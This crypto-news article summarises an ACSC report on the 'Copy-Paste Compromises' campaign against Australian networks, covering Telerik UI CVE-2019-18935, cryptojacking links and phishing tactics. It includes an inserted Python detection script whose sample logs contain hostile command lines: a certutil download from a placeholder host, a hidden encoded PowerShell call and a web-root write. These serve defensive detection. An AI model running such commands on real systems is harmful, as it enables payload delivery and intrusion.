A recent report from the Australian Cyber Security Centre (ACSC) describes a significant vulnerability that is also exploited in the attacks cybercriminals carry out using cryptojacking malware.

The report highlights various tactics, techniques, and procedures (TTPs) the criminals used to exploit their victims, mainly Australian networks. The ACSC said that a group of ‘state actors’ hacked the networks on June 19. In the reported incident, they targeted a vulnerability that has also been linked with cryptojacking malware attacks.

Australia’s government is aware of the matter and is responding to it accordingly. According to the government, the activity represents a highly coordinated cyber-targeting campaign against several Australian institutions.

The term ‘Copy-Paste Compromises’ arises from the actor’s extensive use of web shells, proof-of-concept exploit code, and many other tools copied almost identically from open source.

According to the 48-page report released on June 24, these state actors targeted four crucial vulnerabilities in Telerik UI. CVE-2019-18935 is one of the exploited vulnerabilities and was recently leveraged by the Blue Mockingbird malware gang, which used it to infect numerous systems with the Monero (XMR) mining software XMRig.

Vulnerabilities Commonly Exploited in Cryptojacking Activities

The report does not indicate whether the cybercriminals managed to install cryptojacking malware during the recent massive cyberattack. However, this vulnerability is a preferred route for these criminals to install different types of crypto-mining applications inside corporate networks.

The report dives deep into the CVE-2019-18935 vulnerability. It shows that the exploitation has many similarities with what was seen in Blue Mockingbird’s attacks, but it does not suggest that the gang participated in the cyberattack that targeted Australia:

“Other exploit payloads were identified by the ACSC most commonly when the actor’s attempt at a reverse shell was unsuccessful. These included: a payload that attempted to execute a PowerShell reverse shell; a payload that attempted to execute certutil.exe to download another payload; a payload that executed binary malware (identified in this advisory as HTTPCore) previously uploaded by the actor but which had no persistence mechanism; a payload that enumerated the absolute path of the web root and wrote that path to a file within the web root.”
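The payloads quoted above give a defender concrete things to look for. The following Python script is an added example, not code from the article or the ACSC advisory: it scans constructed process-creation events for a certutil.exe download, an encoded PowerShell command, and a write into the web root, and treats any process spawned by the IIS worker process (w3wp.exe, an assumption about the host of the exploited web application) as suspicious. The event format, field names, and finding names are constructed for this example.

```python
import json
import re

# Constructed sample events in a Sysmon-like JSON-lines shape (not real logs).
SAMPLE_LOG = r"""
{"ts":"2020-06-19T10:01:02Z","host":"web01","parent":"w3wp.exe","image":"powershell.exe","cmd":"powershell.exe -nop -w hidden -enc <b64-placeholder>"}
{"ts":"2020-06-19T10:01:05Z","host":"web01","parent":"w3wp.exe","image":"certutil.exe","cmd":"certutil.exe -urlcache -split -f http://example.invalid/x.dat c:\\temp\\x.dat"}
{"ts":"2020-06-19T10:02:00Z","host":"web01","parent":"w3wp.exe","image":"cmd.exe","cmd":"cmd.exe /c echo c:\\inetpub\\wwwroot > c:\\inetpub\\wwwroot\\p.txt"}
{"ts":"2020-06-19T10:03:00Z","host":"web01","parent":"explorer.exe","image":"powershell.exe","cmd":"powershell.exe Get-Date"}
{"ts":"2020-06-19T10:04:00Z","host":"web01","parent":"svchost.exe","image":"certutil.exe","cmd":"certutil.exe -verify cert.cer"}
"""

# Assumed name of the IIS worker process hosting the exploited web application.
WEB_WORKERS = {"w3wp.exe"}

# (finding name, image regex, command-line regex); the names are ours, not ACSC's.
RULES = [
    ("certutil-download", r"^certutil\.exe$", r"(?i)-urlcache|-verifyctl|-decode"),
    ("powershell-encoded", r"^powershell\.exe$", r"(?i)-(e|enc|encodedcommand)\s"),
    ("webroot-write", r"^cmd\.exe$", r"(?i)>\s*\S*inetpub\\wwwroot"),
]

def analyse(log_text):
    """Return one finding per event that matches at least one indicator."""
    findings = []
    for line in log_text.strip().splitlines():
        ev = json.loads(line)
        reasons = []
        # A shell or LOLBin whose parent is the web worker is the strongest signal.
        if ev["parent"].lower() in WEB_WORKERS:
            reasons.append("spawned-by-web-worker")
        for name, image_re, cmd_re in RULES:
            if re.search(image_re, ev["image"], re.I) and re.search(cmd_re, ev["cmd"]):
                reasons.append(name)
        if reasons:
            findings.append({"ts": ev["ts"], "image": ev["image"], "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f["ts"], f["image"], ", ".join(f["reasons"]))
```

The benign events (an interactive PowerShell session and a certificate verification) produce no finding, so the rules key on the download and encoding switches rather than on the binaries alone.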

How They Operate

These cyber attackers have shown the capability to quickly leverage public exploit proofs of concept (POCs) to target networks. They often conduct reconnaissance of target networks seeking vulnerable services and likely maintain a list of public-facing services so they can rapidly target them following future vulnerability releases.

The criminals have also shown an aptitude for identifying test, development, and orphaned services that are not well known or maintained by the targeted organizations. Where exploitation did not succeed, the ACSC identified that the cybercriminals used different spear phishing methods. This strategy takes the shape of:

  • Emails that contain links to malicious files, or with the malicious file directly attached
  • Links to credential harvesting sites
  • Use of email tracking services to identify email-open and lure click-through events
  • Links that prompt users to grant Office 365 OAuth tokens to the actor

After gaining access, the actors used a combination of custom and open source tools to persist on and frequently interact with the victim network. Even with these tools placed on the network, the actor migrates to legitimate remote access using stolen credentials.

The attacker was identified as using compromised legitimate Australian websites as command and control servers while interacting with victim networks. In general, command and control was conducted using web shells and HTTP/HTTPS traffic. This method renders geo-blocking ineffective and lends legitimacy to malicious network traffic during investigations.

In its research, the ACSC found no intention by the criminals to conduct destructive or disruptive activities inside the victim environments.

Did China’s State Actors Launch This Attack?

Almost 10 Chinese hacker groups have the PlugX malware in their arsenal. These groups engage in espionage activities and allegedly have strong ties to the Chinese government. PlugX was one of the malware families identified in the ACSC report.

Many Australian officials are convinced that China may be behind the widespread cyberattack, pointing to the diplomatic tensions that have been surging between the two nations.

The attack might have followed Australia’s insistence on launching an investigation into the origin of the COVID-19 pandemic, which did not go down well with Chinese officials.

China called the investigation a ‘discriminatory’ accusation and responded quickly with severe trade retaliation against the Oceanic country. Nevertheless, China’s government has denied the hacking claims.

About the author

Wanguba Muriuki is an Editor at Large for E-Crypto News and author of the book "The Exploitative Intrigues of Cryptocurrency Scams Explained." He is also a passionate creator who sees every aspect of life from a written perspective. He loves Blockchain, Cryptocurrency, Technology, and Traveling. He is a widely experienced creative and technical writer. Everything and everyone is describable. The best description is written.
